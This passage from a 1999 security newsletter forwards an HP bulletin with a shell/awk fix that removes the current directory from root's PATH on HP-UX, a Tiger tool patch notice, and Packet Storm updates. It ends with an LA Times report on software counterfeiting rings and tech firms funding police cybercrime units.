  1421.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1422.  
  1423.        To: BugTraq
  1424.        Subject: [support_feedback@us-support.external.hp.com: Security Bulletins Digest]
  1425.        Date: Tue Jul 20 1999 13:58:28
  1426.        Author: Patrick Oonk
  1427.        Message-ID: <19990720135828.J6635@atro.pine.nl>
  1428.       
  1429.       
  1430.       ----- Forwarded message from HP Electronic Support Center  <support_feedback@us-support.external.hp.com> -----
  1431.       
  1432.       Date: Tue, 20 Jul 1999 04:45:18 -0700 (PDT)
  1433.       Subject: Security Bulletins Digest
  1434.       From: support_feedback@us-support.external.hp.com (HP Electronic Support Center )
  1435.       To: security_info@us-support.external.hp.com
  1436.       Reply-To: support_feedback@us-support.external.hp.com
  1437.       Errors-To: support_errors@us-support.external.hp.com
  1438.       
  1439.       
  1440.                               HP Support Information Digests
  1441.       
  1442.       ===============================================================================
  1443.       o  HP Electronic Support Center World Wide Web Service
  1444.          ---------------------------------------------------
  1445.       
  1446.          If you subscribed through the HP Electronic Support Center and would
  1447.          like to be REMOVED from this mailing list, access the
  1448.          HP Electronic Support Center on the World Wide Web at:
  1449.       
  1450.            http://us-support.external.hp.com
  1451.       
  1452.          Login using your HP Electronic Support Center User ID and Password.
  1453.          Then select Support Information Digests.  You may then unsubscribe from the
  1454.          appropriate digest.
  1455.       ===============================================================================
  1456.       
  1457.       
  1458.       Digest Name:  Daily Security Bulletins Digest
  1459.           Created:  Tue Jul 20  3:00:02 PDT 1999
  1460.       
  1461.       Table of Contents:
  1462.       
  1463.       Document ID      Title
  1464.       ---------------  -----------
  1465.       HPSBUX9907-100   CDE Leaves Current Directory in root PATH
  1466.       
  1467.       The documents are listed below.
  1468.       -------------------------------------------------------------------------------
  1469.       
  1470.       
  1471.       Document ID:  HPSBUX9907-100
  1472.       Date Loaded:  19990719
  1473.             Title:  CDE Leaves Current Directory in root PATH
  1474.       
  1475.       -------------------------------------------------------------------------
  1476.       **REVISED 01** HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00100, 07 July 1999
  1477.       Last Revised: 19 July 1999
  1478.       -------------------------------------------------------------------------
  1479.       
  1480.       The information in the following Security Bulletin should be acted upon
  1481.       as soon as possible.  Hewlett-Packard Company will not be liable for any
  1482.       consequences to any customer resulting from customer's failure to fully
  1483.       implement instructions in this Security Bulletin as soon as possible.
  1484.       
  1485.       -------------------------------------------------------------------------
  1486.       PROBLEM:  The current directory is in the root user's PATH
  1487.                 after logging in using CDE.
  1488.       
  1489.       PLATFORM: HP 9000 series 700/800 at HP-UX revision 10.X
  1490.       
  1491.       DAMAGE:  Increase in privileges..
  1492.       
  1493.       SOLUTION: Modify /usr/dt/bin/Xsession until a patch is available.
  1494.       
  1495.       AVAILABILITY:  This advisory will be updated when patches are available.
  1496.       
  1497.       CHANGE SUMMARY: HTML to text conversion instructions for script added.
  1498.       
  1499.       -------------------------------------------------------------------------
  1500.       
  1501.       I.
  1502.          A. Background - The PATH environemnt variable is constructed from
  1503.             several sources including dtsearchpath and scripts in
  1504.             /etc/dt/config/Xsession.d/ and /usr/dt/config/Xsession.d/.
  1505.             The resulting PATH contains the string "::" which will be
  1506.             interpreted as the current directory.  The root user should
  1507.             not have the current directory in the PATH.
  1508.       
  1509.          B. Fixing the problem - Since the PATH environment variable can be
  1510.             affected by dtsearchpath and several scripts, the recommended
  1511.             solution is to clean up the root user's PATH after is has been
  1512.             created.
  1513.       
  1514.       **REVISED 01**
  1515.             Note:  This file is in HTML format.  If you are editing
  1516.             the text version from a mailing the line below:
  1517.       
  1518.                 for (i=1; i<=n; i++) {
  1519.       
  1520.             must be changed.  Replace the characters between
  1521.             the second "i" and the "=n" with the single "less than"
  1522.             character (ascii 0x3c).
  1523.       
  1524.             The line will then read:
  1525.       
  1526.                for (i=1; iX=n; i++) {
  1527.                where X stands for the "less than" character.
  1528.       
  1529.       
  1530.       
  1531.       
  1532.       
  1533.       In /usr/dt/bin/Xsession just before this:
  1534.       
  1535.       # ###########################################################################
  1536.       #
  1537.       #   Startup section.
  1538.       
  1539.       
  1540.       Add this:
  1541.       
  1542.       ###################### Clean up $PATH for root ##########################
  1543.       if [ "$USER" = "root" ]
  1544.       then
  1545.         Log "Clean up PATH for root user"
  1546.         Log "Old PATH = $PATH"
  1547.         PATH=`echo $PATH | awk '
  1548.       {
  1549.        # Remove elements from PATH that are
  1550.        #  (a)  "."
  1551.        #  (b)  ""
  1552.        #  (c)  blank
  1553.        #
  1554.          gsub (" ",":", $0) # Substitite ":" for each blank
  1555.          n = split ($0, path, ":")  # Split into elements with ":" as delimiter
  1556.          first = 1  # To suppress leading ":" in new PATH
  1557.          for (i=1; i<=n; i++) {
  1558.            len = length(path[i])
  1559.            dot = index(path[i], ".")
  1560.            dot_only = 0
  1561.            if ((len == 1) && (dot==1)) {
  1562.              dot_only = 1
  1563.            }
  1564.            # print element if it is not "" and not "."
  1565.            if (!(len==0) && !(dot_only==1)) {
  1566.              if(first != 1) {
  1567.                printf (":") # if not first element, print ":" in front
  1568.              }
  1569.              printf ("%s",path[i])
  1570.              first = 0
  1571.            }
  1572.         }
  1573.       }
  1574.       END { printf ("\n") }'`
  1575.       Log "New PATH = $PATH"
  1576.       fi
  1577.       ###################### End - Clean up $PATH for root ####################
  1578.       
  1579.          C. To subscribe to automatically receive future NEW HP Security
  1580.             Bulletins from the HP Electronic Support Center via electronic
  1581.             mail, do the following:
  1582.       
  1583.             Use your browser to get to the HP Electronic Support Center page
  1584.             at:
  1585.       
  1586.               http://us-support.external.hp.com
  1587.                      (for US, Canada, Asia-Pacific, & Latin-America)
  1588.               http://europe-support.external.hp.com     (for Europe)
  1589.       
  1590.             Login with your user ID and password (or register for one).
  1591.             Remember to save the User ID assigned to you, and your password.
  1592.             Once you are in the Main Menu:
  1593.             To -subscribe- to future HP Security Bulletins,
  1594.               click on "Support Information Digests".
  1595.             To -review- bulletins already released from the main Menu,
  1596.               click on the "Search Technical Knowledge Database."
  1597.       
  1598.             Near the bottom of the next page, click on "Browse the HP
  1599.             Security Bulletin Archive".
  1600.             Once in the archive there is another link to our current Security
  1601.             Patch Matrix.  Updated daily, this matrix categorizes security
  1602.             patches by platform/OS release, and by bulletin topic.
  1603.       
  1604.             The security patch matrix is also available via anonymous ftp:
  1605.       
  1606.             us-ffs.external.hp.com
  1607.             ~ftp/export/patches/hp-ux_patch_matrix
  1608.       
  1609.          D. To report new security vulnerabilities, send email to
  1610.       
  1611.              security-alert@hp.com
  1612.       
  1613.             Please encrypt any exploit information using the security-alert
  1614.             PGP key, available from your local key server, or by sending a
  1615.             message with a -subject- (not body) of 'get key' (no quotes) to
  1616.             security-alert@hp.com.
  1617.       
  1618.            Permission is granted for copying and circulating this Bulletin to
  1619.            Hewlett-Packard (HP) customers (or the Internet community) for the
  1620.            purpose of alerting them to problems, if and only if, the Bulletin
  1621.            is not edited or changed in any way, is attributed to HP, and
  1622.            provided such reproduction and/or distribution is performed for
  1623.            non-commercial purposes.
  1624.       
  1625.            Any other use of this information is prohibited. HP is not liable
  1626.            for any misuse of this information by any third party.
  1627.       ________________________________________________________________________
  1628.       -----End of Document ID:  HPSBUX9907-100--------------------------------------
  1629.       
  1630.       ----- End forwarded message -----
  1631.       
  1632.       -- 
  1633.        Patrick Oonk - PO1-6BONE - patrick@pine.nl - www.pine.nl/~patrick
  1634.        Pine Internet B.V.                            PGP key ID BE7497F1  
  1635.        Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/
  1636.        -- Pine Security Digest - http://security.pine.nl/ (Dutch) ----
  1637.        Excuse of the day: Police are examining all internet packets in
  1638.        the search for a narco-net-traficer
  1639.       
  1640.       
  1641.       [  (application/pgp-signature) ]     
  1642.       
  1643.      @HWA
  1644.      
  1645.      
  1646. 10.0 Tiger vulnerability
  1647.      ~~~~~~~~~~~~~~~~~~~
  1648.      
  1649.        To: BugTraq
  1650.        Subject: tiger vulnerability
  1651.        Date: Tue Jul 20 1999 09:37:39
  1652.        Author: Ellen L Mitchell
  1653.        Message-ID: <199907201437.JAB12684@net.tamu.edu>
  1654.       
  1655.       
  1656.       -----BEGIN PGP SIGNED MESSAGE-----
  1657.       
  1658.       
  1659.       
  1660.       A vulnerability in one of the scripts used by the unix security tool
  1661.       Tiger has been discovered and a patch issued.
  1662.       
  1663.       Tiger is a public domain package developed and maintained by Texas A&M
  1664.       University, used for checking security problems on a Unix system.  Due
  1665.       to lack of checking, a local user can craft a command in such a way
  1666.       that he may have the command executed with the privileges of the
  1667.       process running Tiger (usually root).
  1668.       
  1669.       While no known compromises have occurred due to this vulnerability,
  1670.       it is recommended that the patch be applied if you run tiger.
  1671.       
  1672.       Patches for tiger have been issued and are available at
  1673.       ftp://net.tamu.edu/pub/security/TAMU/
  1674.       
  1675.       Thanks to Michel Miqueu and Philippe Bourgeois of CERT-IST for
  1676.       reporting the problem.
  1677.       
  1678.       Ellen
  1679.       - --
  1680.       Ellen Mitchell
  1681.       Network Group
  1682.       Texas A&M University
  1683.       
  1684.       -----BEGIN PGP SIGNATURE-----
  1685.       Version: 2.6.2
  1686.       
  1687.       iQCVAwUBN5SI2vjlKRxZFQKVAQGm2wQAqfJWT1nW5A3odbYWa+yvUYjRBkACBVac
  1688.       hslPIEtX8xVTOgrsHVK5ugT3lD0jz6jQc2DVkIhp89dS4st/+GrFu6ikcg2PaN1x
  1689.       a7YfqnpYxjRQuTEL9mVG67tyCvsxmOpzv/aTWwEd9AJofRbCUdWK1ruBe2P6Vd2s
  1690.       B/BdszrqfbI=
  1691.       =nyA0
  1692.       -----END PGP SIGNATURE-----
  1693.       
  1694.       @HWA
  1695.       
  1696. 11.0 Packet Storm Working on Corporate Sponsorship 
  1697.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1698.      
  1699.      From http://www.hackernews.com/
  1700.      
  1701.       contributed by xripclaw 
  1702.       Ken Williams has posted a statement saying that Packet
  1703.       Storm Security is not dead. He is currently working on a
  1704.       deal with a corporate sponsor that will allow him to have
  1705.       a professionally maintained site with full staff of security
  1706.       experts, administrators, and web designers. We look
  1707.       forward to new developments. 
  1708.  
  1709.       Tattooman     
  1710.       http://frey.rapidnet.com/~tattooman/
  1711.       
  1712.             
  1713. 12.0  UPDATE ON THE PACKET STORM WEB SITE SITUATION
  1714.       ---------------------------------------------
  1715.       
  1716.       hey,
  1717.       
  1718.       i've been working very hard with numerous corporate entities
  1719.       to try to get the web site back up and online as soon as possible.
  1720.       
  1721.       everything is looking very good now, and i hope to have the site
  1722.       back up and better than ever RSN (Real Soon Now).  hopefully, the
  1723.       site will be run and hosted by a professional security firm (to be 
  1724.       named at the appropriate time), and the new site will be more 
  1725.       professionally maintained by a full staff of security experts, 
  1726.       administrators, and web designers.  with a very substantial amount
  1727.       of corporate funding, the new Packet Storm Security will be a 
  1728.       completely revamped site with more features, more updates, more
  1729.       bandwidth, more of everything.
  1730.       
  1731.       news and updates will be posted here as soon as i get confirmation
  1732.       of the new plans, and contracts are signed.
  1733.       
  1734.       
  1735.       -- Ken Williams, Sat Jul 24 16:34:45 EDT 1999 
  1736.       
  1737.       
  1738.       everything is looking very good and i hope to have great news to
  1739.       post in the next couple of days.
  1740.       
  1741.       
  1742.       -- Ken Williams, Mon Jul 26 22:12:07 EDT 1999
  1743.       
  1744.       
  1745.       Contact Info
  1746.       ------------
  1747.       tattooman@genocide2600.com
  1748.       jkw@rage.resentment.org
  1749.       jkwilli2@unity.ncsu.edu
  1750.       
  1751.       
  1752.       PGP Keys      
  1753.       --------
  1754.       Keys with ASCII Blocks, Fingerprints, and IDs
  1755.       http://www4.ncsu.edu/~jkwilli2/
  1756.       
  1757.       Keys with ASCII Blocks, Fingerprints, IDs, and Certificates
  1758.       http://www.keyserver.net:11371/pks/lookup?template=netensearch%2Cnetennomatch%2Cnetenerror&search=jkwilli2&op=vindex&fingerprint=on&submit=Get+List 
  1759.       
  1760.       @HWA
  1761.       
  1762. 13.0 Piracy is Big Business for Some 
  1763.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1764.      
  1765.      From http://www.hackernews.com/ 
  1766.  
  1767.       contributed by PJ 
  1768.       Churning out thousands of copies at a time for sale in
  1769.       the US and abroad, Southern California is now the home
  1770.       of the software counterfeiter. 
  1771.  
  1772.       LA Times 
  1773.       http://www.latimes.com/HOME/BUSINESS/UPDATES/lat_piracy990725.htm
  1774.  
  1775.       Who pays to arrest the pirates? Intel, Hewlett Packard,
  1776.       and others are funding public police forces. Evidently it
  1777.       is perfectly legal to grant local police departs hundreds
  1778.       of thousands of dollars so that they arrest the people
  1779.       you want them to. The police say there is no conflict of
  1780.       interest. 
  1781.  
  1782.       LA Times   
  1783.       http://www.latimes.com/HOME/BUSINESS/UPDATES/lat_piracy990726.htm
  1784.       
  1785.       
  1786.       
  1787.       LA Times 
  1788.       http://www.latimes.com/HOME/BUSINESS/UPDATES/lat_piracy990725.htm
  1789.     
  1790.               Pirates of the High-Tech Age 
  1791.               
  1792.                  Southern California is now home to a sophisticated breed of criminals who,
  1793.               lured by high profits and low penalties, make and sell counterfeit computer
  1794.               software.
  1795.               By P.J. HUFFSTUTTER, TINI TRAN and DAVID REYES, Times Staff Writer
  1796.  
  1797.  
  1798.           Southern California is becoming the national base for counterfeiters
  1799.            who make bogus software that looks so good even computer
  1800.            experts can't tell the difference.
  1801.            Once a problem confined to Asia and Latin America, high-quality fake
  1802.       CD-ROMs made here are showing up for sale in foreign countries, on
  1803.       Internet sites and even in some retail stores like Fry's Electronics.
  1804.       Authorities have seized nearly $200 million in counterfeit software in
  1805.       dozens of cases in Southern California over the past three years.
  1806.            The disks are manufactured by a new
  1807.       breed of multicultural gangs who operate
  1808.       somewhat like legitimate software
  1809.       companies. Lured by high profits and low
  1810.       penalties, these criminals work cooperatively
  1811.       with each other, often "outsourcing" different
  1812.       aspects of the operation to business partners
  1813.       in order to save time and money.
  1814.            "The irony of all this is the counterfeiters
  1815.       are mimicking us," said Chris Chapin,
  1816.       manager of intellectual property enforcement
  1817.       for video game publisher Electronic Arts Inc.
  1818.       in Redwood City. "They are our worst
  1819.       business rivals."
  1820.            Feeding off the nation's growing number
  1821.       of PC-owners, the counterfeiters are
  1822.       supplying consumers with hot new products such as video games, tax
  1823.       programs and business tools. Software pirates can replicate, for as little as
  1824.       50 cents, disks holding programs that computer companies price at
  1825.       hundreds of dollars.
  1826.            "Look, I can make more money off this than my lawyer can defending
  1827.       me," said one self-described pirate, nicknamed "hax3rz," who was selling
  1828.       illegal copies of top-selling video games on the Internet. "If they want it,
  1829.       I'll sell it."
  1830.            Southern California "is the capital for pirated [software] products in
  1831.       North America," said Nancy Anderson, senior attorney for Microsoft
  1832.       Corp.'s anti-piracy group. "Not Silicon Valley. Not New York. Not Texas.
  1833.       Not Washington. Here."
  1834.            High-tech piracy flourishes amid the anonymous industrial parks in the
  1835.       San Gabriel Valley cities of Walnut, Diamond Bar, City of Industry and
  1836.       Rowland Heights. Investigators have raided one business park in Walnut
  1837.       so many times that police have dubbed it "Pirates' Cove." But operations
  1838.       are also found elsewhere in the region.
  1839.            Earlier this year, in what industry experts describe as the nation's
  1840.       largest-ever software counterfeiting bust, Westminster police and the FBI
  1841.       arrested a dozen people and shut down an alleged piracy scheme with $60
  1842.       million worth of fake Microsoft software sitting on a warehouse floor in
  1843.       the city of Paramount.
  1844.                                     Atul Sowmitra Dhurandhar, a
  1845.                                51-year-old native of India, and his wife
  1846.                                were accused of money laundering and
  1847.                                running the operation that for four years
  1848.                                allegedly churned out counterfeit
  1849.                                CD-ROMs from plants in three
  1850.                                Southern California counties. They
  1851.                                pleaded not guilty, and their trial begins
  1852.                                in Los Angeles federal court this week.
  1853.                                     Like computer executives tapping
  1854.                                personal contacts for deals, Dhurandhar
  1855.       allegedly used friends to create a business network: a convicted Chinese
  1856.       counterfeiter, who obtained a commercial CD-ROM replicator to copy the
  1857.       disks; a Mexican national, who is allegedly a Mexicali state judicial police
  1858.       officer, to smuggle product across the border; and another Mexican to
  1859.       hire illegal immigrants to run the CD replicator.
  1860.            But even as police break up the operations, the software industry still
  1861.       cannot get the public to support its plight.
  1862.            There is little widespread sympathy
  1863.       when a corporation such as
  1864.       Microsoft--which is worth more than
  1865.       $500 billion--complains that it loses
  1866.       hundreds of millions of dollars a year to
  1867.       piracy.
  1868.            The wealthy upper class traditionally
  1869.       is seen by the masses as the enemy, said
  1870.       Robert Kelly, professor of society and
  1871.       criminal justice at the City University of
  1872.       New York. In the past, it was oil barons
  1873.       and railroad tycoons. Today, notes Kelly,
  1874.       Microsoft head Bill Gates is the bad guy.
  1875.            "Fake software is not seen as a
  1876.       threat to the public good," said Alfred
  1877.       Blumstein, a public policy professor at
  1878.       Carnegie Mellon University.
  1879.            Despite software companies
  1880.       aggressively lobbying politicians and
  1881.       spending millions of dollars on
  1882.       anti-piracy advertising campaigns, the
  1883.       laws remain relatively soft on
  1884.       counterfeiters. The result: people who
  1885.       pirate millions of dollars' worth of software often receive only probation.
  1886.            "It's cheap, it's easy and there's almost no risk," said Sgt. Marcus
  1887.       Frank of the Westminster Police Department, who lead the Dhurandhar
  1888.       investigation. "If you were a criminal, wouldn't you do it?"
  1889.  
  1890.            The Key to Success: Networking
  1891.            Frank said the Dhurandhar investigation peaked last fall, when
  1892.       undercover officers staked out warehouses in Paramount, watching as a
  1893.       stream of truck drivers loaded pallets stacked high with fake Microsoft
  1894.       goods.
  1895.                                            The ringleaders had
  1896.                                       allegedly been shipping an
  1897.                                       estimated 15,000 fake
  1898.                                       Microsoft disks a month
  1899.                                       nationwide and overseas. By
  1900.                                       early February, police and the
  1901.                                       FBI had enough evidence to
  1902.                                       get a search warrant and raid
  1903.                                       the operation.
  1904.                                            Officers burst inside a
  1905.                                       warehouse one rainy
  1906.                                       afternoon and surprised six
  1907.                                       immigrant workers, who were
  1908.                                       busy printing counterfeit
  1909.                                       Microsoft user manuals. Here
  1910.       and at nearby facilities, investigators found top-of-the-line CD-ROM
  1911.       duplication equipment, high-speed printing presses and rows of
  1912.       bookbinding and shrink-wrapping machines.
  1913.            Piles of phony warranty cards spilled out of nearby crates. Sixty
  1914.       million dollars' worth of boxed, shiny silver compact disks, all sporting the
  1915.       Microsoft logo, towered over the officers.
  1916.            And tucked off in a corner, police say, was the investigative mother
  1917.       lode: files stuffed with Dhurandhar's business documents and checkbooks.
  1918.       The paperwork mapped out an elaborate counterfeiting network,
  1919.       according to police, and gave investigators leads on the scheme's money
  1920.       trail.
  1921.            Dhurandhar, his wife Mamta--who faces the same charges as her
  1922.       husband--and their attorneys have declined to discuss the case. Ten other
  1923.       suspects will join them at trial this week.
  1924.            Prosecutors say the Dhurandhar case is a textbook example of a
  1925.       modern software counterfeiting operation, where professional networking
  1926.       is the key to success. Someone knows someone with the machinery to
  1927.       copy the disks. Someone else knows of a print-shop owner willing to
  1928.       churn out bogus user manuals.
  1929.            Police say the players in the Southland's growing software piracy
  1930.       industry range from legitimate shop owners to street thugs to U.S.-based
  1931.       Asian gangs, such as the Wah Ching and Black Dragons, to savvy
  1932.       businessmen of all nationalities willing to run a wide-scale operation.
  1933.            Instead of a crime "family" with workers of one ethnicity answering to
  1934.       a boss, these software gangs operate as independent agents with no
  1935.       specific loyalties. Where traditional crime outfits work to improve the
  1936.       power and dominance of their family, these alliances of counterfeiters end
  1937.       when the job is done.
  1938.            "If you're a Crip, you're always a Crip," said Det. Jess Bembry, an
  1939.       expert in Asian organized crime with the Los Angeles Police Dept. These
  1940.       cases are different because "if it benefits them [financially], warring
  1941.       groups will stop fighting to make money together."
  1942.            Like computer executives sealing million-dollar agreements with a
  1943.       handshake, the ancient Chinese rite of guanxi (pronounced gwan-shee) is
  1944.       the unspoken social glue that defines interactions in some Asian societies.
  1945.       For legitimate businessmen throughout the world, guanxi means a
  1946.       person's social rapport is his key currency in the corporate world.
  1947.            It also is a philosophy that, say police, allows accused software
  1948.       counterfeiters such as the Dhurandhars to build a large manufacturing
  1949.       enterprise.
  1950.            Dhurandhar allegedly used several of his businesses, including a Long
  1951.       Beach print shop called Digital Colors, as fronts for the secret operation.
  1952.       Heavily tinted windows shielded the workers and gave no clue as to what
  1953.       was being manufactured inside. By day, the firm was a legitimate printing
  1954.       business, according to court documents. By night, it allegedly was a
  1955.       full-scale counterfeiting and assembly plant.
  1956.            Digital Colors, according to police investigators and the documents
  1957.       they seized, was one hub in a manufacturing labyrinth. Companies in the
  1958.       San Gabriel Valley handled the assembly work. Distributors in Los
  1959.       Angeles and Westminster hawked the goods, which included French,
  1960.       Portuguese and English versions of such bestsellers as Windows 95 and
  1961.       Windows 98, Microsoft's computer operating systems.
  1962.            In Long Beach, Digital Colors made the boxes, which were stored in
  1963.       Paramount warehouses, one of which housed a $1.5-million CD-ROM
  1964.       replicator that is as big as a high school classroom.
  1965.            Finished products allegedly were boxed, shrink-wrapped and sold to
  1966.       mid-level distributors. They, in turn, sold the fakes to other software
  1967.       distributors. Some products were loaded on trucks and hauled across the
  1968.       country, say police. Other goods were taken to Los Angeles International
  1969.       Airport, flown to Northern California and later shipped overseas.
  1970.            Ultimately, the disks allegedly were hawked at swap meets, over the
  1971.       Internet and at small retail shops in the U.S., Canada, Europe and South
  1972.       America.
  1973.            How much money the counterfeiters actually made still is unclear, said
  1974.       assistant U.S. attorney Stephen Larson, 
  1975.            who is prosecuting the case.
  1976.            Court documents allege that the Dhurandhars used an elderly relative's
  1977.       bank account, and other accounts with Bank of America and Bank of
  1978.       Orange County, to launder at least $3.5 million in cash from sales of the
  1979.       fake software products.
  1980.            Profits allegedly were funneled into nearly $5 million worth of
  1981.       residential and commercial properties across Southern California, including
  1982.       a $2.7-million, Spanish-style home in Palos Verdes Estates perched above
  1983.       Lunada Bay, according to state property records and court documents.
  1984.       The Dhurandhars could step through their French doors and enjoy an
  1985.       expansive view of the ocean and Catalina Island.
  1986.            Federal and state authorities seized the properties and arrested the
  1987.       Dhurandhars in June at their home. Police say that Atul Dhurandhar was
  1988.       watering his lawn, and had $20,000 cash in his pocket, when they arrested
  1989.       him.
  1990.            A neighbor, when asked about the Dhurandhars, responded: "We
  1991.       never see them. They keep to themselves."
  1992.  
  1993.            Asian Economic Woes Intensify Piracy
  1994.            The piracy of intellectual property--whether software or music, film or
  1995.       pharmaceuticals--has flourished worldwide for decades. The rise of
  1996.       Southern California as a counterfeiting center is a more recent
  1997.       phenomenon.
  1998.            The other hotbed of software counterfeiting is Asia, where the threat
  1999.       of punishment is relatively low. In legitimate retail shops in Thailand last
  2000.       year, more than 80% of all computer software sold to consumers was
  2001.       pirated, according to the U.S. Trade Representative's office.
  2002.            Last year's Asian economic collapse intensified piracy. Asian police
  2003.       and U.S. federal investigators say formerly legitimate optical disc
  2004.       producers--the companies that manufacture CD-ROMs for software
  2005.       firms in Asia--are now moonlighting as software counterfeiters.
  2006.            Among the offerings in Asian black markets: Microsoft's business
  2007.       software package, Office 2000 Premium, which retails for nearly $8,700
  2008.       in the United States. A week before Office 2000 debuted last month,
  2009.       shoppers who visited open-air markets in Hong Kong and Singapore
  2010.       picked up pirated versions for $20.
  2011.            Like their counterparts in the drug trade, software counterfeiters are
  2012.       well financed and mobile. When Hong Kong officials began cracking
  2013.       down on piracy in 1995, pirates relocated their manufacturing facilities to
  2014.       mainland China and nearby Macau, where there are fewer police
  2015.       agencies tracking copyright violators.
  2016.            Piracy also increased in Southern California. The U.S. Customs
  2017.       Department has tracked a steady increase in the value--and number--of
  2018.       high-tech counterfeit goods it seized this decade leaving the country.
  2019.       Although pirated movies and music get media attention, they made up only
  2020.       2% of all compact disks customs seized in the U.S. last year.
  2021.            Kathlene Karg, director of anti-piracy operations for the Interactive
  2022.       Digital Software Association, said pirates are attracted to the U.S. market
  2023.       because they can charge more.
  2024.            "That's why they're starting to make and distribute their stuff in the
  2025.       U.S. The risk might be greater, but so are the potential profits," she said.
  2026.            The fakes made here are harder to detect. For one thing, say
  2027.       manufacturers, they look great. Counterfeits sold overseas rarely come in
  2028.       anything more elaborate than a plastic sleeve.
  2029.            Americans, however, prefer to buy nicely packaged goods, and pirates
  2030.       can charge more if consumers are convinced they're buying
  2031.       authentic--though drastically discounted--software. Fake versions of
  2032.       Office 2000, similar to those selling for $20 in Singapore, can be found on
  2033.       at least one Internet site for $175. The difference? A user's manual, a
  2034.       warranty card and a shrink-wrapped box. All fake, of course.
  2035.            "Nearly everything [counterfeit] of ours that we're seeing being made
  2036.       in Southern California is retail-ready," said Anne Murphy, an attorney with
  2037.       Microsoft's anti-counterfeiting team. "That's a big threat to our business
  2038.       because people think they're buying the real thing."
  2039.            In fact, high-grade counterfeits are starting to show up in mainstream
  2040.       stores such as Fry's Electronics, industry sources say. The San Jose
  2041.       Police Department's high-tech crime unit in the past year has investigated
  2042.       several such cases.
  2043.            Police officers said that small batches of bogus goods, sold to the chain
  2044.       through independent distributors, had been discovered in inventory at
  2045.       various Fry's stores. Officials at San Jose-based Fry's declined to
  2046.       comment.
  2047.            Investigators won't say whether some consumers had bought fakes.
  2048.       Noting that investigations are ongoing, police also refused to identify the
  2049.       stores that carried the goods, or to disclose what kind of software was
  2050.       counterfeited.
  2051.            Even if the people who made the bogus product are caught, the
  2052.       consequences could be minor. But the downside for consumers could be
  2053.       serious.
  2054.            Counterfeit software could be a copy of an early--and flawed--version
  2055.       of the real thing. It could include viruses that could destroy a person's
  2056.       computer data. And manufacturers refuse to fix fake goods.
  2057.            Federal penalties for counterfeiting are relatively low. If convicted, a
  2058.       person can be sent to prison for up to five years for software
  2059.       counterfeiting. But most software pirates avoid serious punishment and
  2060.       usually serve less than three years, according to officials at the U.S.
  2061.       Attorney's office.
  2062.            Though a federal statute--the Digital Millennium Copyright
  2063.       Act--enacted late last year allows for more serious financial penalties and
  2064.       jail terms, the law remains relatively untested.
  2065.            To date, federal and local prosecutors have focused largely on those
  2066.       accused of running major counterfeiting operations and laundering money,
  2067.       such as the Dhurandhars. Federal money laundering charges have a much
  2068.       stronger legal bite--a minimum of 10 years in prison--than counterfeiting,
  2069.       said Assistant U.S. Attorney Larson, who is chief of the department's
  2070.       organized crime strike force in Los Angeles.
  2071.            "It takes me longer to build a case than the time they end up spending
  2072.       in jail," grumbled Det. Jess Bembry, an expert in Asian crime with the Los
  2073.       Angeles County Sheriff Department. "It's ridiculous."
  2074.            Few consumers sympathize when Microsoft or other large software
  2075.       firms complain about counterfeiters. The Redmond, Wash.-based
  2076.       behemoth is the world's most valuable corporation and has continually
  2077.       exceeded Wall Street's profit expectations. Last week, Microsoft said its
  2078.       fiscal fourth-quarter profits jumped 62%, with earnings for the period
  2079.       climbing to a record $2.2 billion.
  2080.            Microsoft has fought piracy since 1976, when Bill Gates wrote his
  2081.       now-famous "Homebrew" open letter to computer hobbyists. The missive
  2082.       chastised computer users and called them "thieves" for not paying to use
  2083.       the operating software, known as BASIC.
  2084.            Some critics say that software firms fuel piracy by charging too much
  2085.       for their products, but the companies argue that the prices are set to
  2086.       recoup costs of developing and marketing new programs and make a
  2087.       profit.
  2088.            "Counterfeiting is stealing. We don't benefit by it. We don't cause it,"
  2089.       said Murphy, the corporate attorney for Microsoft. 
  2090.            There are three categories of software piracy. "Warez" is the Internet
  2091.       underground community where users gather at little-known online trading
  2092.       posts to swap files. In license infringement piracy, an individual or
  2093.       organization loads a software program onto multiple computers and
  2094.       doesn't pay the manufacturer for each installation. Finally, there is
  2095.       counterfeiting--the practice of taking a program, burning a copy of it onto
  2096.       a disk and selling the CD-ROM for a profit.
  2097.            American willingness to buy counterfeit disks terrifies software firms,
  2098.       which have not convinced the public that downloading a $300 business
  2099.       computer program is as unethical as stealing a $300 leather coat.
  2100.            In fact, the lack of public outrage has so emboldened the criminal
  2101.       sector that consumers sometimes shop for counterfeit brands.
  2102.            Take, for example, the Players, a Malaysian crime syndicate known
  2103.       for making fake console video games. Their products, which are sold
  2104.       throughout Asia and on the Internet, sport a small "Players" logo on the
  2105.       jewel case. This logo also is burned on the game disk itself--often in place
  2106.       of the icon for Sony Corp., the legitimate game publisher.
  2107.            "When it comes to money, morality gets put aside," said Frank of the
  2108.       Westminster Police Department. "Welcome to the new age of
  2109.       international relations."
  2110.                                _ _ _
  2111.  
  2112.            Times staff writer Rone Tempest in Hong Kong contributed to this
  2113.       report.
  2114.       
  2115.      
  2116.       LA Times   
  2117.       http://www.latimes.com/HOME/BUSINESS/UPDATES/lat_piracy990726.htm
  2118.      
  2119.       
  2120.       Tech Firms Pay Police Agencies to Fight Cyber Crime 
  2121.       Law enforcement: Intel funds sheriff's unit that chases computer pirates.
  2122.       Some fear conflict of interest.
  2123.       By P.J. HUFFSTUTTER, Times Staff Writer
  2124.  
  2125.           Gander through the headquarters of the Sacramento County Sheriff
  2126.            Department's high-tech team and see what cops call the "ideal
  2127.            model" for fighting cyber crime in an age of shrinking budgets.
  2128.            Fluorescent lights cast a
  2129.       jaundiced pall over the worn
  2130.       office cubicles, the frayed
  2131.       fabric pinned in spots with
  2132.       tacks. On each desk sits a
  2133.       computer, confiscated from a
  2134.       crime scene and still sporting
  2135.       an evidence tag.
  2136.       Windbreakers with the team
  2137.       logo are a luxury.
  2138.            Then there are the things
  2139.       visitors don't see.
  2140.            Like the $10,000 body
  2141.       wire Intel Corp. bought for
  2142.       the unit to use in undercover
  2143.       stings. Or the corporate jet Hewlett-Packard Co. used to fly officers to
  2144.       Silicon Valley, and the tens of thousands of dollars the computer firm
  2145.       spent for the team's travel expenses--flights, hotels, meals--when a recent
  2146.       case took officers out of town.
  2147.            Tired of being ripped off by high-tech criminals, some of America's
  2148.       most powerful computer companies are fighting back with a relatively
